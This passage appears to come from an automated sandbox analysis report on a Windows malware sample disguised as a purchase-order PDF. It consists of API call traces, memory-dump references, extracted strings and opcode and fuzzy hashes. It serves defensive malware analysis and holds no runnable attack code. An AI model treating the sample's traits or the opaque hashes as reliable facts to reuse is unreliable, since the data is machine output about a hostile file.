                                                                                                            • Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE
                                                                                                            APIs
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                              • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                              • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                              • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                              • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 3585118688-0
                                                                                                            • Opcode ID: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                            • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                            • Opcode Fuzzy Hash: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                            • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                            • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                            • String ID:
                                                                                                            • API String ID: 2102729457-0
                                                                                                            • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                            • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                            • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                            • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                            APIs
                                                                                                              • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                              • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 00405AC2
                                                                                                              • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                              • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                            • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 00405B6A
                                                                                                            • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 3248276644-3081826266
                                                                                                            • Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                            • Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
                                                                                                            • Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                            • Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                            • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 00405748
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: Error launching installer
                                                                                                            • API String ID: 3712363035-66219284
                                                                                                            • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                            • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                            • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                            • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
                                                                                                            • GlobalFree.KERNEL32(?), ref: 0040382A
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403809
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 1100898210-3081826266
                                                                                                            • Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                            • Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
                                                                                                            • Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                            • Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
                                                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrlen
                                                                                                            • String ID: C:\Users\user\Desktop
                                                                                                            • API String ID: 2709904686-224404859
                                                                                                            • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                            • Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
                                                                                                            • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                            • Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                            • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2020005310.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2019990214.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2020057688.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2020073545.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1780285237-0
                                                                                                            • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                            • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                            • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                            • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                            • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                            • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                            • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                            • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                                                                            • API String ID: 0-2525668591
                                                                                                            • Opcode ID: ce30effbe8b0ef5624e4216399e367555d348246c107528ceaaba2b3d7118128
                                                                                                            • Instruction ID: 6f747573016bf37011fde6c46625ef4692f93a0ec4cdc51351a2cf2e517a9e20
                                                                                                            • Opcode Fuzzy Hash: ce30effbe8b0ef5624e4216399e367555d348246c107528ceaaba2b3d7118128
                                                                                                            • Instruction Fuzzy Hash: 57124130A00219DFCB15CF69C994AADBBF2FF88315F558069E825DB261DB31DD89CB90
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                            • API String ID: 0-1487592376
                                                                                                            • Opcode ID: d2a72007e61d5787eb5f4051d5314fe6ddd0e9ec353e85e67cc95b718b29fc1c
                                                                                                            • Instruction ID: 17c81e96024badea58694d8dd79cf1f72c32cf4a8f8559bd951872454413431b
                                                                                                            • Opcode Fuzzy Hash: d2a72007e61d5787eb5f4051d5314fe6ddd0e9ec353e85e67cc95b718b29fc1c
                                                                                                            • Instruction Fuzzy Hash: 5A91D574E00258CFDB18DFA9D884A9DBBF2BF89305F14C069E819AB365DB349985CF50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o^q$4'^q$4'^q$4'^q
                                                                                                            • API String ID: 0-183542557
                                                                                                            • Opcode ID: 86774823c610c287d28744bcf810474a9a1e7d9059f8a8e57cf8cd1d67525909
                                                                                                            • Instruction ID: 37d65931086347ab99bc1ec9043f3d07274a438b24692ebb23a60be2ffd3d613
                                                                                                            • Opcode Fuzzy Hash: 86774823c610c287d28744bcf810474a9a1e7d9059f8a8e57cf8cd1d67525909
                                                                                                            • Instruction Fuzzy Hash: 5BA26E70A04209DFCB15CF68C994AAEBBB2FF88301F158569E815DF261D734ED89CB61
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o^q$Hbq
                                                                                                            • API String ID: 0-662517225
                                                                                                            • Opcode ID: 2d6434aaa9ef5f6c44785648ec6d6e18ae3df541209a505f1fae397029ea06f1
                                                                                                            • Instruction ID: 1d0ccd471b7d5acdf93a1bbffd66a46f4fa5c5e2e2daee9f46811b6c0a030c42
                                                                                                            • Opcode Fuzzy Hash: 2d6434aaa9ef5f6c44785648ec6d6e18ae3df541209a505f1fae397029ea06f1
                                                                                                            • Instruction Fuzzy Hash: DD128F71A00619CFCB14DFA9C854AAEBBF6FF88301F148569E919DB391DB309D85CB90
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                            • API String ID: 0-1932283790
                                                                                                            • Opcode ID: 448eb57d44ebae67c2d2e48b170f549ef33cdee74d07a5b4fb881cf99a1eae30
                                                                                                            • Instruction ID: 163e508bffc7727ec8f6a33fc386a9c0c41d87ee7b6c76754d2d69c40ce6acaa
                                                                                                            • Opcode Fuzzy Hash: 448eb57d44ebae67c2d2e48b170f549ef33cdee74d07a5b4fb881cf99a1eae30
                                                                                                            • Instruction Fuzzy Hash: FD125930A00208DFCB15CF69D984A9EBBF2FF48315F558569E869DB261DB30ED49CB90
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Xbq$Xbq$Xbq$Xbq$Xbq$Xbq
                                                                                                            • API String ID: 0-1317942629
                                                                                                            • Opcode ID: ce8b610d8ad82e6562454783dcd4c5f3ad172fb47f7d3a8df7f1807f2f107971
                                                                                                            • Instruction ID: b1d00f88a76770201dd0a41c844ac03903550f434afdb97266b2a19ac5dc7041
                                                                                                            • Opcode Fuzzy Hash: ce8b610d8ad82e6562454783dcd4c5f3ad172fb47f7d3a8df7f1807f2f107971
                                                                                                            • Instruction Fuzzy Hash: 5742FAA7E1D3E18FC7124B705CB82597FB17B22106BDE459EC8C297287EBA58485C353
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: 0ea490a60e2436c3dcfcffd6ef66fe5945a23dfbd07c8e28caa15c4f8fa5709d
                                                                                                            • Instruction ID: 1cf1ebb06797692ca266ce88899a1764a12c12526612f4d53b4d39a2b469d8af
                                                                                                            • Opcode Fuzzy Hash: 0ea490a60e2436c3dcfcffd6ef66fe5945a23dfbd07c8e28caa15c4f8fa5709d
                                                                                                            • Instruction Fuzzy Hash: AC520074A00218CFDB14DBA4C961BAEBB76EF44300F1081A9D51A7B3A5CF359E89EF51
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Hbq$Hbq
                                                                                                            • API String ID: 0-4258043069
                                                                                                            • Opcode ID: da5c1ad5c42b56370c6df26a9f756d3cdeff641cd0c7f5b955c5b800d8eb868c
                                                                                                            • Instruction ID: b3c973fd80a5ba5422e73b783588b19b989173e10cdc0df429a3fae376365e7a
                                                                                                            • Opcode Fuzzy Hash: da5c1ad5c42b56370c6df26a9f756d3cdeff641cd0c7f5b955c5b800d8eb868c
                                                                                                            • Instruction Fuzzy Hash: 3DB1AE30304650CFCB159F39C8A4B6A7BE6AF88316F158569E816CF3A1DB74CC89CB91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ,bq$,bq
                                                                                                            • API String ID: 0-2699258169
                                                                                                            • Opcode ID: 510339c4830ab6942c842e9cb1f8e6363576fd09d2677d7e3315ceefabab43d9
                                                                                                            • Instruction ID: 0e35f7f0e8a1a2643f581e8e887dfba2d2af4b5d67f8f2c73ad142419ae24df8
                                                                                                            • Opcode Fuzzy Hash: 510339c4830ab6942c842e9cb1f8e6363576fd09d2677d7e3315ceefabab43d9
